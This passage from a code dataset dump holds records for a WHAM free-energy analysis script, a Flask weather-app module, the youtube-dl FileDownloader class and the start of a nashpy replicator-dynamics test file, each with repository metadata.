Dataset schema (one record per source file):

column            type     range / classes
repo_name         string   lengths 5 to 92
path              string   lengths 4 to 221
copies            string   19 classes
size              string   lengths 4 to 6
content           string   lengths 766 to 896k
license           string   15 classes
hash              int64    -9,223,277,421,539,062,000 to 9,223,102,107B
line_mean         float64  6.51 to 99.9
line_max          int64    32 to 997
alpha_frac        float64  0.25 to 0.96
autogenerated     bool     1 class
ratio             float64  1.5 to 13.6
config_test       bool     2 classes
has_no_keywords   bool     2 classes
few_assignments   bool     1 class
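A minimal sketch of filtering records in a dump with this schema on its boolean quality columns, using pandas. The shard file name is a placeholder, not part of this dump; substitute a real file.

import pandas as pd

df = pd.read_parquet("train-00000.parquet")  # hypothetical shard name
# Keep rows that are not autogenerated, not test configs, and contain keywords.
mask = ~(df["autogenerated"] | df["config_test"] | df["has_no_keywords"])
kept = df[mask]
print(len(kept), "of", len(df), "rows kept")
print(kept[["repo_name", "path", "license", "size"]].head())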
repo_name: sunhwan/NAMD-replica
path: wham/myptwham_pt_grand.py
copies: 1
size: 10158
content:
from StringIO import StringIO
import sys, os
import numpy as np

os.environ["CC"] = "gcc-4.9"
os.environ["CXX"] = "g++-4.9"

debug = False
n_max = False
if len(sys.argv) > 1:
    n_max = int(sys.argv[1])

input = sys.stdin
pmf_filename = input.readline().strip()  # stores pmf
rho_filename = input.readline().strip()  # stores average density
bia_filename = input.readline().strip()  # stores biased distribution
fff_filename = input.readline().strip()  # stores F(i)
temperature = float(input.readline().strip())
xmin, xmax, deltax, is_x_periodic = map(float, input.readline().strip().split())
umin, umax, deltau, ntemp = map(float, input.readline().strip().split())
vmin, vmax, deltav = map(float, input.readline().strip().split())
nwin, niter, fifreq = map(int, input.readline().strip().split())
tol, = map(float, input.readline().strip().split())  # scalar tolerance

is_x_periodic = bool(is_x_periodic)
nbinx = int((xmax - xmin) / deltax + 0.5)
nbinu = int(abs(umax - umin) / deltau + 0.5)
nbinv = int(abs(vmax - vmin) / deltav + 0.5)
ntemp = int(ntemp)

kb = 0.0019872
kbt = kb * temperature
beta0 = 1.0/kbt
if debug:
    temperature = 283.15
    kbt = kb * temperature
    beta0 = 1.0/kbt

k1 = np.zeros(nwin)
cx1 = np.zeros(nwin)
temp = np.zeros(ntemp)
beta = np.zeros((nwin, ntemp))
tseries = np.empty(nwin, dtype='S')
hist = np.zeros((nwin, ntemp, nbinx, nbinu, nbinv), dtype=np.int)
nb_data = np.zeros((nwin, ntemp), dtype=np.int)

x1 = lambda j: xmin + (j+1)*deltax - 0.5*deltax
u1 = lambda j: (j+1)*deltau - 0.5*deltau
v1 = lambda j: (j+1)*deltav - 0.5*deltav
energy = np.zeros((nbinx, nbinu))
press = 1.01325 * 1.4383 * 10**-5
data_range = [[None, None], [None, None], [None, None]]

def mkhist(fname, xmin, xmax, ymin, ymax, deltax, deltay, ihist, jtemp, k, cx):
    xdata = []
    udata = []
    vdata = []
    count = 0
    for line in open(fname):
        time, x, u, v = map(float, line.strip().split()[:4])
        xdata.append(x)
        udata.append(u)
        vdata.append(v)
        if debug and len(xdata) > 10000:
            break
        if n_max and len(xdata) > n_max:
            break
    x = np.array(xdata)
    u = np.array(udata)
    v = np.array(vdata)
    u = u - k*(x-cx)**2  #+ press * v
    xbins = [xmin+i*deltax for i in range(nbinx+1)]
    ubins = [umin+i*deltau for i in range(nbinu+1)]
    vbins = [vmin+i*deltav for i in range(nbinv+1)]
    data = np.array((x, u, v)).transpose()
    hist[ihist, jtemp], edges = np.histogramdd(data, bins=(xbins, ubins, vbins),
                                               range=((xmin, xmax), (umin, umax), (vmin, vmax)))
    nb_data[ihist, jtemp] = np.sum(hist[ihist, jtemp])

    if data_range[0][0] is None or np.min(x) < data_range[0][0]: data_range[0][0] = np.min(x)
    if data_range[0][1] is None or np.max(x) > data_range[0][1]: data_range[0][1] = np.max(x)
    if data_range[1][0] is None or np.min(u) < data_range[1][0]: data_range[1][0] = np.min(u)
    if data_range[1][1] is None or np.max(u) > data_range[1][1]: data_range[1][1] = np.max(u)
    if data_range[2][0] is None or np.min(v) < data_range[2][0]: data_range[2][0] = np.min(v)
    if data_range[2][1] is None or np.max(v) > data_range[2][1]: data_range[2][1] = np.max(v)

    xedges = edges[0]
    uedges = edges[1]
    print 'statistics for timeseries # ', ihist
    print 'minx:', '%8.3f' % np.min(x), 'maxx:', '%8.3f' % np.max(x)
    print 'average x', '%8.3f' % np.average(x), 'rms x', '%8.3f' % np.std(x)
    print 'minu:', '%8.3f' % np.min(u), 'maxu:', '%8.3f' % np.max(u)
    print 'average u', '%8.3f' % np.average(u), 'rms u', '%8.3f' % np.std(u)
    print 'statistics for histogram # ', ihist
    print int(np.sum(hist[ihist, jtemp])), 'points in the histogram x'
    print 'average x', '%8.3f' % (np.sum([hist[ihist,jtemp,i,:]*(xedges[i]+xedges[i+1])/2 for i in range(nbinx)])/np.sum(hist[ihist,jtemp]))
    print 'average u', '%8.3f' % (np.sum([hist[ihist,jtemp,:,i]*(uedges[i]+uedges[i+1])/2 for i in range(nbinu)])/np.sum(hist[ihist,jtemp]))
    print

for j in range(ntemp):
    for i in range(nwin):
        fname = input.readline().strip()
        tseries[i] = fname
        line = input.readline().strip()
        cx1[i], k1[i], temp[j] = map(float, line.split()[:3])
        beta[i,j] = 1 / (kb * temp[j])
        mkhist(fname, xmin, xmax, umin, umax, deltax, deltau, i, j, k1[i], cx1[i])

print 'minx:', '%8.3f' % data_range[0][0], 'maxx:', '%8.3f' % data_range[0][1]
print 'minu:', '%8.3f' % data_range[1][0], 'maxu:', '%8.3f' % data_range[1][1]
print 'minv:', '%8.3f' % data_range[2][0], 'maxv:', '%8.3f' % data_range[2][1]
print hist.shape

# write biased distribution
f = open(bia_filename, 'w')
for j in range(nbinx):
    for k in range(nbinu):
        f.write("%8d\n" % np.sum(hist[:,:,j,k]))

# iterate wham equation to unbias and recombine the histogram
TOP = np.zeros((nbinx, nbinu, nbinv), dtype=np.int32)
BOT = np.zeros((nbinx, nbinu, nbinv))
W1 = np.zeros((nwin, ntemp, nbinx))
U1 = np.zeros((nwin, ntemp, nbinu))
V1 = np.zeros((nwin, ntemp, nbinv))

for i in range(nwin):
    for j in range(ntemp):
        for k in range(nbinx):
            W1[i,j,k] = k1[i]*(x1(k) - cx1[i])**2
        for l in range(nbinu):
            U1[i,j,l] = u1(l)
        for m in range(nbinv):
            V1[i,j,m] = v1(m) * press

for k in range(nbinx):
    for l in range(nbinu):
        for m in range(nbinv):
            TOP[k,l,m] = np.sum(hist[:,:,k,l,m])

np.set_printoptions(linewidth=200)

from scipy import weave
from scipy.weave import converters

def wham2d(nb_data, TOP, nbinx, nbinu, nbinv, W1, V1, U1, beta, beta0, F=None):
    icycle = 1
    rho = np.zeros((nbinx, nbinu, nbinv), np.double)
    if F is None:
        F = np.zeros((nwin, ntemp))
    F2 = np.zeros((nwin, ntemp), np.double)

    while icycle < niter:
        code_pragma = """
        double beta1;
        beta1 = beta0;
        #pragma omp parallel num_threads(nthreads)
        {
        #pragma omp for collapse(3)
        for (int k=0; k<nbinx; k++) {
          for (int l=0; l<nbinu; l++) {
            for (int m=0; m<nbinv; m++) {
              double BOT = 0.0;
              for (int i=0; i<nwin; i++) {
                for (int j=0; j<ntemp; j++) {
                  BOT += nb_data(i,j)*exp(F(i,j)-beta(i,j)*(W1(i,j,k)+U1(i,j,l)+V1(i,j,m))
                                          +beta1*(U1(i,j,l)+V1(i,j,m)));
                }
              }
              if (BOT < 1e-100 || TOP(k,l,m) == 0) continue;
              rho(k,l,m) = TOP(k,l,m) / BOT;
            }
          }
        }

        #pragma omp for collapse(2)
        for (int i=0; i<nwin; i++) {
          for (int j=0; j<ntemp; j++) {
            for (int k=0; k<nbinx; k++) {
              for (int l=0; l<nbinu; l++) {
                for (int m=0; m<nbinv; m++) {
                  F2(i,j) += rho(k,l,m)*exp(-beta(i,j)*(W1(i,j,k)+U1(i,j,l)+V1(i,j,m))
                                            + beta1*(U1(i,j,l)+V1(i,j,m)));
                }
              }
            }
          }
        }
        }
        """
        nthreads = 4
        weave.inline(code_pragma,
                     ['F', 'F2', 'rho', 'nb_data', 'beta', 'W1', 'U1', 'V1', 'beta0',
                      'TOP', 'nbinx', 'nbinu', 'nbinv', 'nwin', 'ntemp', 'nthreads'],
                     type_converters=converters.blitz,
                     extra_compile_args=['-O3 -fopenmp'], extra_link_args=['-O3 -fopenmp'],
                     headers=['<omp.h>'])  #, library_dirs=['/Users/sunhwan/local/python/lib'])

        converged = True
        F2 = -np.log(F2)
        F2 = F2 - np.min(F2)
        diff = np.max(np.abs(F2 - F))
        if diff > tol:
            converged = False
        print 'round = ', icycle, 'diff = ', diff
        icycle += 1

        if ( fifreq != 0 and icycle % fifreq == 0 ) or ( icycle == niter or converged ):
            print F2
            #open(fff_filename, 'w').write("%8i %s\n" % (icycle, " ".join(["%8.3f" % f for f in F2])))
        if icycle == niter or converged:
            break
        F = F2
        F2 = np.zeros((nwin, ntemp))
    return F2, rho

F = np.zeros((nwin, ntemp))
for i in range(ntemp):
    temperature = temp[i]
    kbt = kb * temperature
    beta0 = 1.0/kbt
    fff = "%s.%d" % (fff_filename, i)
    if i == 0 and os.path.exists(fff):
        F = np.loadtxt(fff)
    F, rho = wham2d(nb_data, TOP, nbinx, nbinu, nbinv, W1, V1, U1, beta, beta0, F)
    np.savetxt(fff, F)

    # jacobian
    for j in range(nbinx):
        rho[j] = rho[j] / x1(j)**2

    # average energy
    avgur = np.zeros(nbinx)
    avgur2 = np.zeros(nbinx)
    avgvr = np.zeros(nbinx)
    rho = rho / np.sum(rho)
    for k in range(nbinx):
        for l in range(nbinu):
            for m in range(nbinv):
                if not (TOP[k,l,m] > 0): continue
                avgur[k] += rho[k,l,m]/np.sum(rho[k]) * u1(l)
                avgur2[k] += rho[k,l,m]/np.sum(rho[k]) * u1(l) * u1(l)
                avgvr[k] += rho[k,l,m]/np.sum(rho[k]) * v1(m)

    # find maximum rho
    rho = np.sum(rho, axis=(1,2))
    jmin = np.argmax(rho)
    rhomax = rho[jmin]
    #print 'maximum density at: x = ', x1(jmin)
    x0 = int(( 10.55 - xmin ) / deltax)
    rhomax = np.sum(rho[x0-5:x0+5])/10
    avgu = np.sum(avgur[nbinx-10:])/10
    avgv = np.sum(avgvr[nbinx-10:])/10
    #cv = ( avgur2 - avgur**2 ) / kbt / temperature
    #avgcv = np.average(cv)
    print temperature, avgu, avgv

    # make PMF from the rho
    np.seterr(divide='ignore')
    pmf = -kbt * np.log(rho/rhomax)
    open("%s.%d" % (pmf_filename, i), 'w').write("\n".join(
        ["%8.3f %12.8f %12.8f %12.8f" % (x1(j), pmf[j], avgvr[j]-avgv, avgur[j]-avgu) for j in range(nbinx)]))
    open("%s.%d" % (rho_filename, i), 'w').write("\n".join(
        ["%8.3f %12.8f" % (x1(j), rho[j]) for j in range(nbinx)]))
license: bsd-2-clause
hash: 4,400,316,292,958,923,300
line_mean: 37.332075
line_max: 340
alpha_frac: 0.511616
autogenerated: false
ratio: 2.680211
config_test: false
has_no_keywords: false
few_assignments: false
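The scipy.weave kernel in the record above iterates the WHAM self-consistency equations with a temperature-reweighting term. A minimal pure-NumPy sketch of one such iteration, with variable names and shapes following the script (illustrative only; it materializes the full bias-energy array, which is exactly what the OpenMP kernel avoids):

import numpy as np

def wham_iteration(F, nb_data, TOP, W1, U1, V1, beta, beta0):
    # F, nb_data, beta: (nwin, ntemp); W1/U1/V1: (nwin, ntemp, nbinx/u/v);
    # TOP: (nbinx, nbinu, nbinv) histogram counts summed over windows.
    E = (W1[:, :, :, None, None]
         + U1[:, :, None, :, None]
         + V1[:, :, None, None, :])                      # bias energy per bin
    rw = beta0 * (U1[:, :, None, :, None] + V1[:, :, None, None, :])
    w = np.exp(F[:, :, None, None, None] - beta[:, :, None, None, None] * E + rw)
    BOT = np.einsum('ij,ijklm->klm', nb_data, w)          # denominator per bin
    rho = np.where(BOT > 0, TOP / np.maximum(BOT, 1e-100), 0.0)
    # New free-energy shifts: F_ij = -ln sum_klm rho * exp(-beta_ij E + beta0 (U+V))
    F_new = -np.log(np.einsum('klm,ijklm->ij', rho,
                              np.exp(-beta[:, :, None, None, None] * E + rw)))
    return F_new - F_new.min(), rho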
repo_name: zackzachariah/feelslike
path: weather.py
copies: 1
size: 1194
content:
# Created 2014 by Zack Sheppard. Licensed under the MIT License (see LICENSE file)

""" Main handlers for the two pages that make up the clear-weather app """

from flask import Flask, request, url_for
import api_endpoint, os, web_endpoints

app = Flask(__name__)

if (not app.debug):
    import logging
    from logging import StreamHandler
    app.logger.setLevel(logging.INFO)
    app.logger.addHandler(StreamHandler())

def path_to_style(lessPath):
    return url_for('static', filename='styles/css/' + lessPath + '.css')

def path_to_image(imagePath):
    return url_for('static', filename='img/' + imagePath)

def path_to_script(scriptPath):
    return url_for('static', filename='scripts/' + scriptPath + '.js')

def google_analytics():
    return os.environ.get('GOOGLE_ANALYTICS', None)

app.jinja_env.globals.update(path_to_style = path_to_style)
app.jinja_env.globals.update(path_to_image = path_to_image)
app.jinja_env.globals.update(path_to_script = path_to_script)
app.jinja_env.globals.update(google_analytics = google_analytics)

@app.before_request
def before_request():
    app.logger.info('Handling base: ' + request.base_url)

web_endpoints.setupWebRoutes(app)
api_endpoint.setupApiRoute(app)
license: mit
hash: -6,699,916,966,404,352,000
line_mean: 29.615385
line_max: 82
alpha_frac: 0.742044
autogenerated: false
ratio: 3.218329
config_test: false
has_no_keywords: false
few_assignments: false
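The module above delegates route registration to web_endpoints.setupWebRoutes(app). The actual feelslike endpoints are not part of this dump; a hypothetical stand-in showing the pattern it relies on:

# Hypothetical web_endpoints.py: a module-level function that attaches routes
# to whatever Flask app it is handed, mirroring the call in weather.py.
from flask import render_template

def setupWebRoutes(app):
    @app.route('/')
    def index():
        # path_to_style / path_to_image / path_to_script are usable in the
        # template because weather.py injected them into app.jinja_env.globals.
        return render_template('index.html')

    @app.route('/about')
    def about():
        return render_template('about.html')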
repo_name: valmynd/MediaFetcher
path: src/plugins/youtube_dl/youtube_dl/downloader/common.py
copies: 1
size: 12568
content:
from __future__ import division, unicode_literals

import os
import re
import sys
import time
import random

from ..compat import compat_os_name
from ..utils import (
    decodeArgument,
    encodeFilename,
    error_to_compat_str,
    format_bytes,
    shell_quote,
    timeconvert,
)


class FileDownloader(object):
    """File Downloader class.

    File downloader objects are the ones responsible of downloading the
    actual video file and writing it to disk.

    File downloaders accept a lot of parameters. In order not to saturate
    the object constructor with arguments, it receives a dictionary of
    options instead.

    Available options:

    verbose:            Print additional info to stdout.
    quiet:              Do not print messages to stdout.
    ratelimit:          Download speed limit, in bytes/sec.
    retries:            Number of times to retry for HTTP error 5xx
    buffersize:         Size of download buffer in bytes.
    noresizebuffer:     Do not automatically resize the download buffer.
    continuedl:         Try to continue downloads if possible.
    noprogress:         Do not print the progress bar.
    logtostderr:        Log messages to stderr instead of stdout.
    consoletitle:       Display progress in console window's titlebar.
    nopart:             Do not use temporary .part files.
    updatetime:         Use the Last-modified header to set output file timestamps.
    test:               Download only first bytes to test the downloader.
    min_filesize:       Skip files smaller than this size
    max_filesize:       Skip files larger than this size
    xattr_set_filesize: Set ytdl.filesize user xattribute with expected size.
    external_downloader_args:  A list of additional command-line arguments for
                        the external downloader.
    hls_use_mpegts:     Use the mpegts container for HLS videos.
    http_chunk_size:    Size of a chunk for chunk-based HTTP downloading. May be
                        useful for bypassing bandwidth throttling imposed by
                        a webserver (experimental)

    Subclasses of this one must re-define the real_download method.
    """

    _TEST_FILE_SIZE = 10241
    params = None

    def __init__(self, ydl, params):
        """Create a FileDownloader object with the given options."""
        self.ydl = ydl
        self._progress_hooks = []
        self.params = params
        self.add_progress_hook(self.report_progress)

    @staticmethod
    def format_seconds(seconds):
        (mins, secs) = divmod(seconds, 60)
        (hours, mins) = divmod(mins, 60)
        if hours > 99:
            return '--:--:--'
        if hours == 0:
            return '%02d:%02d' % (mins, secs)
        else:
            return '%02d:%02d:%02d' % (hours, mins, secs)

    @staticmethod
    def calc_percent(byte_counter, data_len):
        if data_len is None:
            return None
        return float(byte_counter) / float(data_len) * 100.0

    @staticmethod
    def format_percent(percent):
        if percent is None:
            return '---.-%'
        return '%6s' % ('%3.1f%%' % percent)

    @staticmethod
    def calc_eta(start, now, total, current):
        if total is None:
            return None
        if now is None:
            now = time.time()
        dif = now - start
        if current == 0 or dif < 0.001:  # One millisecond
            return None
        rate = float(current) / dif
        return int((float(total) - float(current)) / rate)

    @staticmethod
    def format_eta(eta):
        if eta is None:
            return '--:--'
        return FileDownloader.format_seconds(eta)

    @staticmethod
    def calc_speed(start, now, bytes):
        dif = now - start
        if bytes == 0 or dif < 0.001:  # One millisecond
            return None
        return float(bytes) / dif

    @staticmethod
    def format_speed(speed):
        if speed is None:
            return '%10s' % '---b/s'
        return '%10s' % ('%s/s' % format_bytes(speed))

    @staticmethod
    def format_retries(retries):
        return 'inf' if retries == float('inf') else '%.0f' % retries

    @staticmethod
    def best_block_size(elapsed_time, bytes):
        new_min = max(bytes / 2.0, 1.0)
        new_max = min(max(bytes * 2.0, 1.0), 4194304)  # Do not surpass 4 MB
        if elapsed_time < 0.001:
            return int(new_max)
        rate = bytes / elapsed_time
        if rate > new_max:
            return int(new_max)
        if rate < new_min:
            return int(new_min)
        return int(rate)

    @staticmethod
    def parse_bytes(bytestr):
        """Parse a string indicating a byte quantity into an integer."""
        matchobj = re.match(r'(?i)^(\d+(?:\.\d+)?)([kMGTPEZY]?)$', bytestr)
        if matchobj is None:
            return None
        number = float(matchobj.group(1))
        multiplier = 1024.0 ** 'bkmgtpezy'.index(matchobj.group(2).lower())
        return int(round(number * multiplier))

    def to_screen(self, *args, **kargs):
        self.ydl.to_screen(*args, **kargs)

    def to_stderr(self, message):
        self.ydl.to_screen(message)

    def to_console_title(self, message):
        self.ydl.to_console_title(message)

    def trouble(self, *args, **kargs):
        self.ydl.trouble(*args, **kargs)

    def report_warning(self, *args, **kargs):
        self.ydl.report_warning(*args, **kargs)

    def report_error(self, *args, **kargs):
        self.ydl.report_error(*args, **kargs)

    def slow_down(self, start_time, now, byte_counter):
        """Sleep if the download speed is over the rate limit."""
        rate_limit = self.params.get('ratelimit')
        if rate_limit is None or byte_counter == 0:
            return
        if now is None:
            now = time.time()
        elapsed = now - start_time
        if elapsed <= 0.0:
            return
        speed = float(byte_counter) / elapsed
        if speed > rate_limit:
            time.sleep(max((byte_counter // rate_limit) - elapsed, 0))

    def temp_name(self, filename):
        """Returns a temporary filename for the given filename."""
        if self.params.get('nopart', False) or filename == '-' or \
                (os.path.exists(encodeFilename(filename)) and
                    not os.path.isfile(encodeFilename(filename))):
            return filename
        return filename + '.part'

    def undo_temp_name(self, filename):
        if filename.endswith('.part'):
            return filename[:-len('.part')]
        return filename

    def ytdl_filename(self, filename):
        return filename + '.ytdl'

    def try_rename(self, old_filename, new_filename):
        try:
            if old_filename == new_filename:
                return
            os.rename(encodeFilename(old_filename), encodeFilename(new_filename))
        except (IOError, OSError) as err:
            self.report_error('unable to rename file: %s' % error_to_compat_str(err))

    def try_utime(self, filename, last_modified_hdr):
        """Try to set the last-modified time of the given file."""
        if last_modified_hdr is None:
            return
        if not os.path.isfile(encodeFilename(filename)):
            return
        timestr = last_modified_hdr
        if timestr is None:
            return
        filetime = timeconvert(timestr)
        if filetime is None:
            return filetime
        # Ignore obviously invalid dates
        if filetime == 0:
            return
        try:
            os.utime(filename, (time.time(), filetime))
        except Exception:
            pass
        return filetime

    def report_destination(self, filename):
        """Report destination filename."""
        self.to_screen('[download] Destination: ' + filename)

    def _report_progress_status(self, msg, is_last_line=False):
        fullmsg = '[download] ' + msg
        if self.params.get('progress_with_newline', False):
            self.to_screen(fullmsg)
        else:
            if compat_os_name == 'nt':
                prev_len = getattr(self, '_report_progress_prev_line_length', 0)
                if prev_len > len(fullmsg):
                    fullmsg += ' ' * (prev_len - len(fullmsg))
                self._report_progress_prev_line_length = len(fullmsg)
                clear_line = '\r'
            else:
                clear_line = ('\r\x1b[K' if sys.stderr.isatty() else '\r')
            self.to_screen(clear_line + fullmsg, skip_eol=not is_last_line)
        self.to_console_title('youtube-dl ' + msg)

    def report_progress(self, s):
        if s['status'] == 'finished':
            if self.params.get('noprogress', False):
                self.to_screen('[download] Download completed')
            else:
                msg_template = '100%%'
                if s.get('total_bytes') is not None:
                    s['_total_bytes_str'] = format_bytes(s['total_bytes'])
                    msg_template += ' of %(_total_bytes_str)s'
                if s.get('elapsed') is not None:
                    s['_elapsed_str'] = self.format_seconds(s['elapsed'])
                    msg_template += ' in %(_elapsed_str)s'
                self._report_progress_status(
                    msg_template % s, is_last_line=True)

        if self.params.get('noprogress'):
            return

        if s['status'] != 'downloading':
            return

        if s.get('eta') is not None:
            s['_eta_str'] = self.format_eta(s['eta'])
        else:
            s['_eta_str'] = 'Unknown ETA'

        if s.get('total_bytes') and s.get('downloaded_bytes') is not None:
            s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes'])
        elif s.get('total_bytes_estimate') and s.get('downloaded_bytes') is not None:
            s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes_estimate'])
        else:
            if s.get('downloaded_bytes') == 0:
                s['_percent_str'] = self.format_percent(0)
            else:
                s['_percent_str'] = 'Unknown %'

        if s.get('speed') is not None:
            s['_speed_str'] = self.format_speed(s['speed'])
        else:
            s['_speed_str'] = 'Unknown speed'

        if s.get('total_bytes') is not None:
            s['_total_bytes_str'] = format_bytes(s['total_bytes'])
            msg_template = '%(_percent_str)s of %(_total_bytes_str)s at %(_speed_str)s ETA %(_eta_str)s'
        elif s.get('total_bytes_estimate') is not None:
            s['_total_bytes_estimate_str'] = format_bytes(s['total_bytes_estimate'])
            msg_template = '%(_percent_str)s of ~%(_total_bytes_estimate_str)s at %(_speed_str)s ETA %(_eta_str)s'
        else:
            if s.get('downloaded_bytes') is not None:
                s['_downloaded_bytes_str'] = format_bytes(s['downloaded_bytes'])
                if s.get('elapsed'):
                    s['_elapsed_str'] = self.format_seconds(s['elapsed'])
                    msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s (%(_elapsed_str)s)'
                else:
                    msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s'
            else:
                msg_template = '%(_percent_str)s %% at %(_speed_str)s ETA %(_eta_str)s'

        self._report_progress_status(msg_template % s)

    def report_resuming_byte(self, resume_len):
        """Report attempt to resume at given byte."""
        self.to_screen('[download] Resuming download at byte %s' % resume_len)

    def report_retry(self, err, count, retries):
        """Report retry in case of HTTP error 5xx"""
        self.to_screen(
            '[download] Got server HTTP error: %s. Retrying (attempt %d of %s)...'
            % (error_to_compat_str(err), count, self.format_retries(retries)))

    def report_file_already_downloaded(self, file_name):
        """Report file has already been fully downloaded."""
        try:
            self.to_screen('[download] %s has already been downloaded' % file_name)
        except UnicodeEncodeError:
            self.to_screen('[download] The file has already been downloaded')

    def report_unable_to_resume(self):
        """Report it was impossible to resume download."""
        self.to_screen('[download] Unable to resume')

    def download(self, filename, info_dict):
        """Download to a filename using the info from info_dict
        Return True on success and False otherwise
        """
        nooverwrites_and_exists = (
            self.params.get('nooverwrites', False) and
            os.path.exists(encodeFilename(filename))
        )

        if not hasattr(filename, 'write'):
            continuedl_and_exists = (
                self.params.get('continuedl', True) and
                os.path.isfile(encodeFilename(filename)) and
                not self.params.get('nopart', False)
            )

            # Check file already present
            if filename != '-' and (nooverwrites_and_exists or continuedl_and_exists):
                self.report_file_already_downloaded(filename)
                self._hook_progress({
                    'filename': filename,
                    'status': 'finished',
                    'total_bytes': os.path.getsize(encodeFilename(filename)),
                })
                return True

        min_sleep_interval = self.params.get('sleep_interval')
        if min_sleep_interval:
            max_sleep_interval = self.params.get('max_sleep_interval', min_sleep_interval)
            sleep_interval = random.uniform(min_sleep_interval, max_sleep_interval)
            self.to_screen(
                '[download] Sleeping %s seconds...' % (
                    int(sleep_interval) if sleep_interval.is_integer()
                    else '%.2f' % sleep_interval))
            time.sleep(sleep_interval)

        return self.real_download(filename, info_dict)

    def real_download(self, filename, info_dict):
        """Real download process. Redefine in subclasses."""
        raise NotImplementedError('This method must be implemented by subclasses')

    def _hook_progress(self, status):
        for ph in self._progress_hooks:
            ph(status)

    def add_progress_hook(self, ph):
        # See YoutubeDl.py (search for progress_hooks) for a description of
        # this interface
        self._progress_hooks.append(ph)

    def _debug_cmd(self, args, exe=None):
        if not self.params.get('verbose', False):
            return

        str_args = [decodeArgument(a) for a in args]

        if exe is None:
            exe = os.path.basename(str_args[0])

        self.to_screen('[debug] %s command line: %s' % (
            exe, shell_quote(str_args)))
license: gpl-3.0
hash: 557,000,624,049,092,600
line_mean: 31.308483
line_max: 105
alpha_frac: 0.667489
autogenerated: false
ratio: 3.151454
config_test: false
has_no_keywords: false
few_assignments: false
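Per the docstring above, subclasses must re-define real_download, and progress is reported through hooks. A minimal illustrative subclass (not part of the record; the class name and trivial payload are hypothetical):

# Illustrative only: a trivial FileDownloader subclass that honors the
# documented contract using only methods the class above defines.
class NullDownloader(FileDownloader):
    def real_download(self, filename, info_dict):
        self.report_destination(filename)
        tmp = self.temp_name(filename)
        with open(tmp, 'wb') as f:
            f.write(b'')  # a real subclass would stream info_dict['url'] here
        self.try_rename(tmp, filename)
        self._hook_progress({
            'filename': filename,
            'status': 'finished',
            'total_bytes': 0,
        })
        return True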
repo_name: drvinceknight/Nashpy
path: tests/unit/test_replicator_dynamics.py
copies: 1
size: 62289
content:
""" Tests for Replicator Dynamics """ import numpy as np import pytest from hypothesis import given, settings from hypothesis.strategies import integers from hypothesis.extra.numpy import arrays from nashpy.learning.replicator_dynamics import ( get_derivative_of_fitness, replicator_dynamics, get_derivative_of_asymmetric_fitness, asymmetric_replicator_dynamics, ) @given(M=arrays(np.int8, (3, 3))) def test_property_get_derivative_of_fitness(M): t = 0 x = np.zeros(M.shape[1]) derivative_of_fitness = get_derivative_of_fitness(x, t, M) assert len(derivative_of_fitness) == len(x) def test_get_derivative_of_fitness(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) x_values = ( np.array([1, 0, 0]), np.array([1 / 2, 1 / 2, 0]), np.array([0, 1 / 4, 3 / 4]), np.array([1 / 5, 2 / 5, 2 / 5]), np.array([1 / 2, 0, 1 / 2]), np.array([2 / 4, 1 / 4, 1 / 4]), ) derivative_values = ( np.array([0, 0, 0]), np.array([0, 0, 0]), np.array([0.0, -0.09375, 0.09375]), np.array([0.128, -0.144, 0.016]), np.array([0.375, 0.0, -0.375]), np.array([0.125, 0.0, -0.125]), ) for x_value, expected_derivative in zip(x_values, derivative_values): derivative = get_derivative_of_fitness(x=x_value, t=0, A=M) assert np.allclose(derivative, expected_derivative), x_value @given(M=arrays(np.int8, (3, 3))) def test_property_of_output_dimension_for_games_of_size_3(M): xs = replicator_dynamics(M) assert all(len(x) == 3 for x in xs) @given(M=arrays(np.int8, (4, 4))) def test_property_of_output_dimension_for_games_of_size_4(M): xs = replicator_dynamics(M) assert all(len(x) == 4 for x in xs) def test_replicator_dynamics_example_1(): M = np.array([[3, 2], [4, 1]]) y0 = np.array([0.9, 0.1]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [0.9, 0.1], [0.89256013, 0.10743987], [0.88479436, 0.11520564], [0.87671801, 0.12328199], [0.86834987, 0.13165013], [0.8597121, 0.1402879], [0.8508299, 0.1491701], [0.8417312, 0.1582688], [0.83244622, 0.16755378], [0.82300701, 0.17699299], [0.81344687, 0.18655313], [0.80379989, 0.19620011], [0.79410031, 0.20589969], [0.78438204, 0.21561796], [0.77467816, 0.22532184], [0.76502043, 0.23497957], [0.75543894, 0.24456106], [0.74596174, 0.25403826], [0.73661466, 0.26338534], [0.72742107, 0.27257893], [0.7184018, 0.2815982], [0.70957507, 0.29042493], [0.70095654, 0.29904346], [0.69255932, 0.30744068], [0.6843941, 0.3156059], [0.67646927, 0.32353073], [0.66879107, 0.33120893], [0.66136378, 0.33863622], [0.65418987, 0.34581013], [0.64727021, 0.35272979], [0.64060422, 0.35939578], [0.63419006, 0.36580994], [0.62802483, 0.37197517], [0.62210466, 0.37789534], [0.61642492, 0.38357508], [0.61098033, 0.38901967], [0.60576506, 0.39423494], [0.60077288, 0.39922712], [0.59599723, 0.40400277], [0.59143133, 0.40856867], [0.58706824, 0.41293176], [0.5829009, 0.4170991], [0.57892225, 0.42107775], [0.57512523, 0.42487477], [0.57150283, 0.42849717], [0.56804814, 0.43195186], [0.56475435, 0.43524565], [0.56161481, 0.43838519], [0.558623, 0.441377], [0.55577261, 0.44422739], [0.55305749, 0.44694251], [0.55047167, 0.44952833], [0.5480094, 0.4519906], [0.54566512, 0.45433488], [0.54343348, 0.45656652], [0.54130932, 0.45869068], [0.53928768, 0.46071232], [0.53736381, 0.46263619], [0.53553315, 0.46446685], [0.53379131, 0.46620869], [0.53213411, 0.46786589], [0.53055754, 0.46944246], [0.52905777, 0.47094223], [0.52763113, 0.47236887], [0.52627413, 0.47372587], [0.52498342, 0.47501658], [0.52375581, 0.47624419], [0.52258827, 0.47741173], [0.52147788, 0.47852212], [0.52042188, 0.47957812], [0.51941764, 0.48058236], 
